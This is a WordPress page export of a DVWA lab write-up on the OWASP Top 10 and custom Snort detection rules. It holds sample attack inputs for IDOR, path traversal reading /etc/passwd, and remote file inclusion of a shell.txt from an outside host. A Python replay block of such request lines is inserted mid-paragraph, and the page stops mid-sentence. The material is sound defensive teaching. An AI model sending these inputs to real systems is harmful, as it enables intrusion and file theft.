{"id":832,"date":"2024-03-16T00:51:00","date_gmt":"2024-03-16T00:51:00","guid":{"rendered":"https:\/\/victorcoil.tech\/?page_id=832"},"modified":"2026-04-19T16:15:59","modified_gmt":"2026-04-19T16:15:59","slug":"owasp-top-10-and-snort-rule-creation","status":"publish","type":"page","link":"https:\/\/victorcoil.tech\/?page_id=832","title":{"rendered":"OWASP Top 10 and Snort Rule Creation"},"content":{"rendered":"\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-container-core-group-is-layout-22177b6a wp-block-group-is-layout-constrained\" style=\"padding-top:100px;padding-bottom:100px\">\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-flow wp-block-group-is-layout-flow\">\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" id=\"SnortRules\">\n<h2 class=\"wp-block-heading has-text-align-left is-style-lineseparator zeever-animate zeever-move-right zeever-delay-1 has-zeever-primary-color has-text-color has-heading-2-font-size\">Snort Rules<\/h2>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-left zeever-animate zeever-move-right zeever-delay-3 has-zeever-secondary-color has-text-color has-tiny-font-size\" style=\"font-style:normal;font-weight:500;text-transform:uppercase\">Basic Snort Rule Format<\/h2>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\"><\/div>\n<\/div>\n<\/div>\n\n\n\n<div class=\"wp-block-group zeever-animate zeever-move-up zeever-delay-3 has-zeever-bgsoft-background-color has-background is-layout-constrained 
wp-container-core-group-is-layout-32cee7d8 wp-block-group-is-layout-constrained\" style=\"padding-top:40px\">\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-style-customborderbottomhover zeever-animate zeever-move-up zeever-delay-1 has-black-background-color has-background is-layout-flow wp-block-column-is-layout-flow\" style=\"padding-top:50px;padding-right:40px;padding-bottom:50px;padding-left:40px\">\n<h2 class=\"wp-block-heading has-text-align-left has-zeever-primary-color has-text-color has-heading-3-font-size\" style=\"margin-top:20px;font-style:normal;font-weight:600\">DVWA Download<\/h2>\n\n\n\n<p>You can follow along with how I did it, or look at the official GitHub repository to see what other options and changes DVWA supports.<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/digininja\/DVWA\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/github.com\/digininja\/DVWA<\/a><\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-style-customborderbottomhover zeever-animate zeever-move-up zeever-delay-3 has-black-background-color has-background is-layout-flow wp-block-column-is-layout-flow\" style=\"padding-top:50px;padding-right:40px;padding-bottom:50px;padding-left:40px\">\n<h2 class=\"wp-block-heading has-text-align-left has-zeever-primary-color has-text-color has-heading-3-font-size\" style=\"margin-top:20px;font-style:normal;font-weight:600\">Lab Brief Summary<\/h2>\n\n\n\n<p class=\"has-text-align-left has-zeever-bodytext-color has-text-color\">Configured the DVWA web server with Snort as an IPS to demonstrate the OWASP Top 10. I bring up easily understandable vulnerabilities and their respective mitigation strategies, correlated with each category. 
I have also developed tailored Snort rules for the applicable vulnerabilities.<\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-style-customborderbottomhover zeever-animate zeever-move-up zeever-delay-5 has-black-background-color has-background is-layout-flow wp-block-column-is-layout-flow\" style=\"padding-top:50px;padding-right:40px;padding-bottom:50px;padding-left:40px\">\n<h2 class=\"wp-block-heading has-text-align-left has-zeever-primary-color has-text-color has-heading-3-font-size\" style=\"margin-top:20px;font-style:normal;font-weight:600\">Additional Helpful Links<\/h2>\n\n\n\n<p><a href=\"https:\/\/docs.snort.org\/rules\/\" target=\"_blank\" rel=\"noopener\" title=\"\">Snort 3 Rules Manual<\/a><\/p>\n\n\n\n<p><a href=\"http:\/\/manual-snort-org.s3-website-us-east-1.amazonaws.com\/node27.html\" target=\"_blank\" rel=\"noopener\" title=\"\">Snort 2 Rules Manual<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.pcre.org\/original\/doc\/html\/pcrepattern.html\" target=\"_blank\" rel=\"noopener\" title=\"\">PCRE (Regex) Manual<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.w3schools.com\/tags\/ref_urlencode.ASP\" target=\"_blank\" rel=\"noopener\" title=\"\">HTML URL Encoding Reference<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/owasp.org\/Top10\/\" target=\"_blank\" rel=\"noopener\" title=\"\">OWASP Top 10<\/a><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n\n\n<p>This lab was originally going to focus on Snort rule creation, but I decided to include examples and scenarios to help me remember the OWASP Top 10, using Damn Vulnerable Web Application (DVWA) to illustrate them.<\/p>\n\n\n\n<p>First, I want to go over how a Snort rule is structured. I used Snort 2 in this lab. You will usually find rules written on one line, but I like to put a backslash (\u201c\\\u201d) at the end of each rule option to continue the rule on the next line, which makes it easier to read. 
Snort 3 does not require backslashes, as it treats the newlines inside a rule as ordinary whitespace.<\/p>\n\n\n\n<p>The rule below alerts on a path traversal attempt against one specific URL. I will be using this rule to explain the format.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>alert tcp any any -&gt; any 80<\/strong> (\\\nmsg:\"Possible Path Traversal attempt 2\";\\\nuricontent:\"\/vulnerabilities\/fi\/?page=\";\\\ncontent:\"..\/\";\\\nsid:1000028;\\\nrev:1;\\\n)\n\n# The above as a one-liner would be this\n\n<strong>alert tcp any any -&gt; any 80<\/strong> (msg:\"Possible Path Traversal attempt 2\"; uricontent:\"\/vulnerabilities\/fi\/?page=\"; content:\"..\/\"; sid:1000028; rev:1;)<\/code><\/pre>\n\n\n\n<p>The first line is the &#8220;rule header&#8221;.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>alert tcp any any -&gt; any 80<\/strong><\/code><\/pre>\n\n\n\n<p>The first component is the \u201crule action.\u201d The keyword \u201calert\u201d generates an alert and logs the packet. Snort 2 also has \u201clog\u201d (log without alerting), \u201cpass\u201d (ignore the packet) and, when running inline as an IPS, \u201cdrop\u201d (drop and log), \u201csdrop\u201d (drop silently) and \u201creject\u201d (drop, log and send a TCP reset or ICMP unreachable). Snort 3 keeps \u201calert\u201d and adds \u201cblock,\u201d which drops the packet and the rest of its flow, alongside \u201cdrop,\u201d which drops only the matching packet. More options can be found in the Snort manuals linked at the beginning.<\/p>\n\n\n\n<p>After the rule action comes the \u201cprotocol.\u201d In this case, the rule looks for \u201ctcp\u201d packets. In Snort 2 this field can only be tcp, udp, icmp or ip; Snort 3 additionally accepts service names such as http, ssh and ssl, which it matches on the service its inspectors identify rather than on the port number.<\/p>\n\n\n\n<p>After the protocol comes the \u201csource address and port.\u201d In this rule the source is \u201cany\u201d IP address on \u201cany\u201d port, which in the lab I treat as the external side.<\/p>\n\n\n\n<p>After that is the \u201cdirection operator.\u201d It tells Snort which side of the rule is the source and which is the destination of the traffic. So, in this case, it is external TO the home network. 
Snort only has the one-way operator (-&gt;) and the bidirectional operator (&lt;&gt;); there is no &lt;- operator, so to match traffic going the other way you swap the two address and port pairs.<\/p>\n\n\n\n<p>As mentioned before, the home network (the destination side) is to the right of the direction operator. I recommend that the home network&#8217;s address be the actual IP address or subnet of the system you&#8217;re trying to defend (or the $HOME_NET variable from snort.conf), not just &#8220;any,&#8221; so the rule does not fire on every port-80 packet the sensor happens to see.<\/p>\n\n\n\n<p>The rest of the rule is known as the \u201cbody,\u201d the rule options, which is shown below.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>(\\\nmsg:\"Possible Path Traversal attempt 2\";\\\nuricontent:\"\/vulnerabilities\/fi\/?page=\";\\\ncontent:\"..\/\";\\\nsid:1000028;\\\nrev:1;\\\n)<\/code><\/pre>\n\n\n\n<p>Usually, you will see this format, with \u201cmsg\u201d (message) at the top. It is a short description of the rule and is the text an analyst sees in the alert, so make it specific.<\/p>\n\n\n\n<p>After the msg come the actual detection options. There are many, and I will not go through them all, but in the rules I created for this lab I use content, uricontent, http_uri, http_method, pcre, flow, and detection_filter.<\/p>\n\n\n\n<p>The rule above uses \u201curicontent\u201d and \u201ccontent.\u201d It is a fairly simple rule that checks whether \u201c\/vulnerabilities\/fi\/?page=\u201d is present in the normalized URI and whether \u201c..\/\u201d appears anywhere in the packet payload. Every option in a rule must match for it to fire; they are ANDed together.<\/p>\n\n\n\n<p>After that come the sid and rev. The sid is the unique number of the rule (use 1000000 or above for your own rules, since lower numbers are reserved for the official rule sets), and the rev is its revision number. Bump the rev every time you change the rule so an alert can always be tied to the exact version that produced it. 
<\/p>\n\n\n\n<p>I did mention other options, but I will cover those in the later rules when the options are discussed.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>Below are the rules listed; you can click on them and jump to where they are on this page.<\/p>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-vertical is-layout-flex wp-container-core-group-is-layout-c35747d5 wp-block-group-is-layout-flex\">\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortPT\" title=\"\">Path traversal<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortPT2\" title=\"\">Path Traversal 2<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortRFI\" title=\"\">Remote File Inclusion<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortSQL\" title=\"\">SQL Injection<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#BlindSQL\" title=\"\">Blind SQL Injection<\/a><\/li>\n<\/ul>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-vertical is-layout-flex wp-container-core-group-is-layout-c35747d5 wp-block-group-is-layout-flex\">\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortCommand\" title=\"\">Command Injection<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortReflected\" title=\"\">Reflected XSS<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortDOM\" title=\"\">DOM XSS<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortStored\" title=\"\">Stored XSS<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortBrute\" title=\"\">Brute Force Password Attack<\/a><\/li>\n<\/ul>\n<\/div>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-container-core-group-is-layout-22177b6a wp-block-group-is-layout-constrained\" style=\"padding-top:100px;padding-bottom:100px\">\n<div 
class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<div id=\"OWASP10\" class=\"wp-block-group is-layout-flow wp-block-group-is-layout-flow\">\n<div class=\"wp-block-columns has-zeever-bgsoft-background-color has-background is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<h2 class=\"wp-block-heading has-text-align-left is-style-lineseparator zeever-animate zeever-move-right zeever-delay-1 has-zeever-primary-color has-text-color has-heading-2-font-size\">OWASP Top 10<\/h2>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-left zeever-animate zeever-move-right zeever-delay-3 has-zeever-secondary-color has-text-color has-tiny-font-size\" style=\"font-style:normal;font-weight:500;text-transform:uppercase\">Categories with Examples and Rules<\/h2>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\"><\/div>\n<\/div>\n<\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>I won\u2019t be going too in-depth, as many categories have 20+ CWEs or Weaknesses mapped. However, I will mention some common weaknesses I usually recall when considering a category. 
I will list the Categories below if you want to jump to a specific one.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><a href=\"#BAC\" title=\"\">Broken Access Control<\/a><\/li>\n\n\n\n<li><a href=\"#Crypto\" title=\"\">Cryptographic Failures<\/a><\/li>\n\n\n\n<li><a href=\"#Injections\" title=\"\">Injections<\/a><\/li>\n\n\n\n<li><a href=\"#InsecureDesign\" title=\"\">Insecure Design<\/a><\/li>\n\n\n\n<li><a href=\"#SecMisConf\" title=\"\">Security Misconfiguration<\/a><\/li>\n\n\n\n<li><a href=\"#vulnComp\" title=\"\">Vulnerable and Outdated Components<\/a><\/li>\n\n\n\n<li><a href=\"#IAM\" title=\"\">Identification and Authentication Failures<\/a><\/li>\n\n\n\n<li><a href=\"#SoftData\" title=\"\">Software and Data Integrity Failures<\/a><\/li>\n\n\n\n<li><a href=\"#SecLog\" title=\"\">Security Logging and Monitoring Failures<\/a><\/li>\n\n\n\n<li><a href=\"#SSRF\" title=\"\">Server-Side Request Forgery<\/a><\/li>\n<\/ol>\n\n\n\n<p><\/p>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"BAC\">1. Broken Access Control <\/h3>\n\n\n\n<p><strong>     A. IDOR (Insecure Direct Object reference)<\/strong><\/p>\n\n\n\n<p>A typical example of broken access control is IDOR (insecure direct object reference).<\/p>\n\n\n\n<p>IDOR can allow you to view or modify another user account. As shown below, a URL may contain a unique key\/number tied to a user account. 
In this example, imagine this being the end of a URL, where the unique ID is 1 and belongs to a user named \u201cnormie.\u201d<\/p>\n\n\n\n<p><strong>\u201c&#8230;?account=1&amp;name=normie\u201d<\/strong><\/p>\n\n\n\n<p>Just by replacing the unique ID with a 0<\/p>\n\n\n\n<p><strong>\u201c&#8230;?account=0&amp;name=normie\u201d<\/strong><\/p>\n\n\n\n<p>and sending the request again, the server returns account 0 instead of your own. If the server never checks that the logged-in user actually owns the account it was asked for, you can view and modify anything that user can access.<\/p>\n\n\n\n<p><strong>\u201c&#8230;?account=0&amp;name=Admin\u201d<\/strong><\/p>\n\n\n\n<p>This is extremely oversimplified, but it can help paint the picture. The identifier does not have to be a small integer; sequential or guessable IDs are simply the easiest case to exploit.<\/p>\n\n\n\n<p><strong>      B. Path Traversal \/ Local File Inclusion \/ Remote File Inclusion<\/strong><\/p>\n\n\n\n<p>I will be combining these three common examples.<\/p>\n\n\n\n<p>All three get the application to touch files outside its intended scope: in this case, outside what DVWA should be allowed to read or execute.<\/p>\n\n\n\n<p>Path traversal and LFI overlap heavily. Path traversal\u2019s defining trait is using dot-dot-slash sequences (\u201c..\/..\/\u201d) to climb out of the directory the application meant to stay in; its usual result is reading a file the application should never expose. LFI is the case where user input ends up in an include or require call, so the server does not just read the file but executes it if it contains PHP; the path can be relative, absolute, or built from the same dot-dot-slash sequences. That is what turns a file the attacker controls on the box (an uploaded image with PHP inside it, or a poisoned log) into a backdoor.<\/p>\n\n\n\n<p>Below is an example of a path traversal vulnerability. 
In this case, it is reading and returning a file, which is clearly out of scope for the DVWA server.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"646\" height=\"462\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/FilePathTraversal.png\" alt=\"\" class=\"wp-image-834\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/FilePathTraversal.png 646w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/FilePathTraversal-300x215.png 300w\" sizes=\"(max-width: 646px) 100vw, 646px\" \/><\/figure>\n\n\n\n<p>Below is an example of a Local file inclusion. We can see that the dots and slashes were unnecessary and that we could instead use the absolute path.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"590\" height=\"422\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/localFileInclusion.png\" alt=\"\" class=\"wp-image-835\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/localFileInclusion.png 590w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/localFileInclusion-300x215.png 300w\" sizes=\"(max-width: 590px) 100vw, 590px\" \/><\/figure>\n\n\n\n<p>Then, here is an example of a remote file inclusion. 
Here, instead of including a file from the local disk, we are making the server fetch and include a file from a remote host.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"603\" height=\"35\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion.png\" alt=\"\" class=\"wp-image-836\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion.png 603w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion-300x17.png 300w\" sizes=\"(max-width: 603px) 100vw, 603px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"592\" height=\"409\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion2.png\" alt=\"\" class=\"wp-image-837\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion2.png 592w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion2-300x207.png 300w\" sizes=\"(max-width: 592px) 100vw, 592px\" \/><\/figure>\n\n\n\n<p>Many of the risks associated with these vulnerabilities can be reduced by following the principle of least privilege: lock down the permissions on files and directories, and give every application and person ONLY the permissions their task requires. A web server account that cannot read \/etc\/shadow or write into the document root limits what a traversal or LFI can reach even when the bug is present. RFI additionally depends on the PHP setting allow_url_include, which is off by default and should stay off anywhere outside a lab.<\/p>\n\n\n\n<p>In the case of DVWA, the impossible level of the File Inclusion module is fixed by comparing the page parameter against a hard-coded allowlist of the three legitimate include files and refusing anything else. OWASP recommends the same approach: do not build a file path from user input at all, and where the user must choose a file, map the choice through an allowlist rather than trusting the name.<\/p>\n\n\n\n<p>In the case of IDOR, the fix is a server-side access control check on every object the user asks for, made against the session rather than anything the client sends. Keeping raw database identifiers out of URLs and POST bodies (using per-user indirect references instead) reduces how much an attacker can enumerate, but it is not a substitute for the check.<\/p>\n\n\n\n<p><strong>Snort rules<\/strong><\/p>\n\n\n\n<p>I made two simple Snort rules to detect path traversal, as seen in the image below. They work. 
However, some things about the two are essential to know.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"735\" height=\"179\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/snortRuleOutputTraversal.png\" alt=\"\" class=\"wp-image-838\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/snortRuleOutputTraversal.png 735w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/snortRuleOutputTraversal-300x73.png 300w\" sizes=\"(max-width: 735px) 100vw, 735px\" \/><\/figure>\n\n\n\n<p id=\"SnortPT\">This first rule checks whether the HTTP method is \u201cGET.\u201d If it is, it checks for a \u201c..\/\u201d anywhere in the URI. The ordering looks a bit odd, but it is how Snort 2 reads it: http_method and http_uri are content modifiers, so each one applies to the content option immediately before it and restricts that match to the named HTTP buffer. Those buffers only exist when the http_inspect preprocessor is enabled for the port, which the default snort.conf does for port 80. Put a modifier anywhere other than directly after its content and Snort refuses to load the rule when you test the configuration (snort -T -c snort.conf).<\/p>\n\n\n\n<p>To better understand it, we can start with the first &#8220;content&#8221; and read it as&#8230;<\/p>\n\n\n\n<p>&#8220;I&#8217;m looking for &#8220;GET.&#8221;<\/p>\n\n\n\n<p>Where do you want me to look? &#8220;In the http_method&#8221;<\/p>\n\n\n\n<p>I&#8217;m looking for &#8220;..\/&#8221;<\/p>\n\n\n\n<p>Where am I looking for this? 
&#8220;in the http_uri&#8221;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>alert tcp any any -&gt; any 80 (\\\nmsg:\"Possible Path Traversal attempt\";\\\ncontent:\"GET\";\\\nhttp_method;\\\ncontent:\"..\/\";\\\nhttp_uri;\\\nsid:1000027;\\\nrev:1;\\\n)<\/code><\/pre>\n\n\n\n<p id=\"SnortPT2\">The second rule is the one I used to explain the format of Snort rules. It looks for the specific URL and then for \u201c..\/\u201d anywhere in the packet.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>alert tcp any any -&gt; any 80 (\\\nmsg:\"Possible Path Traversal attempt 2\";\\\nuricontent:\"\/vulnerabilities\/fi\/?page=\";\\\ncontent:\"..\/\";\\\nsid:1000028;\\\nrev:1;\\\n)<\/code><\/pre>\n\n\n\n<p>The first rule can detect traversal attempts against any URL because it only looks at the method and the URI. The downside is that it will generate more false positives, since \u201c..\/\u201d can turn up in legitimate query strings. The upside is that http_uri matches the URI after http_inspect has normalized it, so a percent-encoded \u201c%2e%2e%2f\u201d is decoded before the comparison and still caught (depending on the http_inspect configuration, that normalization may also collapse \u201c\/..\/\u201d sequences away, so test the rule against real traffic before trusting it).<\/p>\n\n\n\n<p>The second rule focuses on a single URL, resulting in fewer false positives. Its \u201c..\/\u201d match is a bare content, though, so it searches the raw payload and an encoded traversal slips past it. uricontent is the older Snort 2 spelling of content followed by http_uri; Snort 3 dropped it.<\/p>\n\n\n\n<p id=\"SnortRFI\">The third rule I want to mention in this section is shown below. It can be used to detect remote file inclusions. Like the last rule, it focuses on one URL.<\/p>\n\n\n\n<p>This is the first rule where I use PCRE, which is regex. I anchored it on the URL we are looking at and made it check whether the included location starts with HTTP or HTTPS. 
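To see what the two traversal rules above and the RFI rule that follows actually catch, here is an added Python example of mine (not Snort's code and not the author's) that replays the three rules over constructed request lines. It assumes a simplified model of Snort 2's buffers: http_uri and uricontent look at the percent-decoded URI, while a bare content, or a pcre without the U flag, looks at the raw payload. The DVWA path is the module's real one; the request lines and the 203.0.113.5 host are constructed samples.

```python
"""Replay of the three file-inclusion rules over constructed request lines.
Added example: not Snort's code and not the page author's. It models Snort 2
buffer selection in a simplified way (assumption): http_uri / uricontent see
the percent-decoded URI, while a bare content, or a pcre without the U flag,
sees the raw payload. Real http_inspect normalization is configurable and can
differ from this model."""
import re
from urllib.parse import unquote

DVWA_FI = "/vulnerabilities/fi/?page="

# pcre:"/\?page=https?\x3a\x2f\x2f/i" from the RFI rule; \x3a\x2f\x2f is "://".
RFI_PCRE = re.compile(r"\?page=https?\x3a\x2f\x2f", re.IGNORECASE)


def split_request_line(raw):
    """Return (method, raw_uri, normalized_uri) for 'GET /path?x=y HTTP/1.1'."""
    method, raw_uri, _version = raw.split(" ", 2)
    return method, raw_uri, unquote(raw_uri)


def rule_1000027(raw):
    """content:"GET"; http_method; content:"../"; http_uri;
    Any URL, GET only, and the "../" is searched in the decoded URI."""
    method, _raw_uri, norm_uri = split_request_line(raw)
    return method == "GET" and "../" in norm_uri


def rule_1000028(raw):
    """uricontent:"/vulnerabilities/fi/?page="; content:"../";
    One URL (decoded URI), but the "../" is searched in the raw payload."""
    _method, _raw_uri, norm_uri = split_request_line(raw)
    return DVWA_FI in norm_uri and "../" in raw


def rule_1000029(raw):
    r"""uricontent:"/vulnerabilities/fi/?page="; pcre:"/\?page=https?\x3a\x2f\x2f/i";
    The pcre carries no U flag, so it runs over the raw payload."""
    _method, _raw_uri, norm_uri = split_request_line(raw)
    return DVWA_FI in norm_uri and RFI_PCRE.search(raw) is not None


def evaluate(raw):
    """Map of sid -> fired for one request line."""
    return {
        "1000027": rule_1000027(raw),
        "1000028": rule_1000028(raw),
        "1000029": rule_1000029(raw),
    }


# Constructed request lines (203.0.113.5 is a documentation address, not a
# real host). Each one probes a different blind spot of the three rules.
SAMPLES = {
    "plain_traversal": "GET /vulnerabilities/fi/?page=../../../../etc/passwd HTTP/1.1",
    "encoded_traversal": "GET /vulnerabilities/fi/?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1",
    "other_url_traversal": "GET /vulnerabilities/upload/?file=../../etc/passwd HTTP/1.1",
    "post_traversal": "POST /vulnerabilities/fi/?page=../../etc/passwd HTTP/1.1",
    "plain_rfi": "GET /vulnerabilities/fi/?page=http://203.0.113.5/shell.txt HTTP/1.1",
    "encoded_rfi": "GET /vulnerabilities/fi/?page=http%3a%2f%2f203.0.113.5/shell.txt HTTP/1.1",
}

if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print(f"{name:20} {evaluate(line)}")
```

The encoded_traversal and encoded_rfi cases are the caveat: the uricontent half still matches because it sees the decoded URI, but the raw "../" and "://" checks do not, which is why the http_uri form (or a U flag on the pcre) is the one to prefer. The post_traversal case shows the other trade-off: rule 1's http_method restriction makes it miss a POST that rule 2 catches.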
The \u201c?\u201d after \u201chttps\u201d tells the regex engine \u201cthere may or may not be an s here.\u201d The hex escapes after \u201chttps?\u201d (\\x3a\\x2f\\x2f) are just \u201c:\/\/\u201d, and the trailing \u201ci\u201d makes the match case-insensitive. When it comes to PCRE, I recommend having the URL encoding table on the side. Note that a pcre with no buffer modifier runs over the raw payload, so a percent-encoded \u201c%3a%2f%2f\u201d would not match; adding the U flag (\/...\/iU) makes it search the normalized URI instead, the same buffer uricontent uses.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>alert tcp any any -&gt; any 80 (\\\nmsg:\"Possible Remote File Inclusion attempt\";\\\nuricontent:\"\/vulnerabilities\/fi\/?page=\";\\\npcre:\"\/\\?page=https?\\x3a\\x2f\\x2f\/i\";\\\nsid:1000029;\\\nrev:1;\\\n)<\/code><\/pre>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"Crypto\">2. Cryptographic Failures<\/h3>\n\n\n\n<p>The second category, as the title says, covers cryptography that fails or is not used at all. This can happen with data in transit, at rest, or in use.<\/p>\n\n\n\n<p>     A. Data in transit is exposed when it travels over protocols with no encryption, such as HTTP, FTP, Telnet, and plain SMTP.<\/p>\n\n\n\n<p>Now, DVWA does not have a specific section for this vulnerability, but the site is served over HTTP, so the login credentials cross the network in plaintext. Below is a picture of Wireshark capturing the DVWA credentials.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"742\" height=\"456\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/plainPassWire.png\" alt=\"\" class=\"wp-image-840\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/plainPassWire.png 742w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/plainPassWire-300x184.png 300w\" sizes=\"(max-width: 742px) 100vw, 742px\" \/><\/figure>\n\n\n\n<p>It is important to use HTTPS instead of HTTP to avoid this type of exposure. I won\u2019t go into changing the entire unsecured website to a secure version. 
Still, in a scenario where you did have HTTPS running: inside \/etc\/apache2\/sites-available\/ you will find the virtual host configuration files. In the HTTPS one, SSLProtocol controls which TLS versions the site will negotiate and SSLCipherSuite which cipher suites it offers. Only TLS 1.2 and 1.3 with strong suites should be listed; leaving SSLv3, TLS 1.0 or 1.1, or export and RC4 suites enabled lets an attacker force a downgrade to them.<\/p>\n\n\n\n<p>B. Data at rest is sensitive information sitting on disk or in a database, not being processed and not being sent across the wire. Passwords must never be stored in plaintext; store a salted, slow password hash instead, so that a leaked table still does not hand over the passwords. I still have not touched on it, but an SQL injection can be performed in DVWA that exposes the table holding the usernames and password hashes.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"446\" height=\"222\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/atrestPass.png\" alt=\"\" class=\"wp-image-841\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/atrestPass.png 446w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/atrestPass-300x149.png 300w\" sizes=\"(max-width: 446px) 100vw, 446px\" \/><\/figure>\n\n\n\n<p>The result shown above is after running the SQL injection. 
We get an unsalted MD5 hash, which for a common password can be looked up in a free online table in seconds.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"826\" height=\"385\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/atrestHashCracked.png\" alt=\"\" class=\"wp-image-842\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/atrestHashCracked.png 826w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/atrestHashCracked-300x140.png 300w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/atrestHashCracked-768x358.png 768w\" sizes=\"(max-width: 826px) 100vw, 826px\" \/><\/figure>\n\n\n\n<p>This leads to the real fix: passwords should be stored with a dedicated password-hashing function (bcrypt, scrypt or Argon2id), which is deliberately slow and salts every hash for you, rather than with a fast general-purpose digest like MD5 or SHA-1. That hashing belongs in the application layer, not in the database: DVWA is PHP, and PHP\u2019s password_hash() and password_verify() give you bcrypt (PASSWORD_BCRYPT) or Argon2id (PASSWORD_ARGON2ID) with no extra code, so a fixed version of the login would simply call those.<\/p>\n\n\n\n<p>C. Data in use is 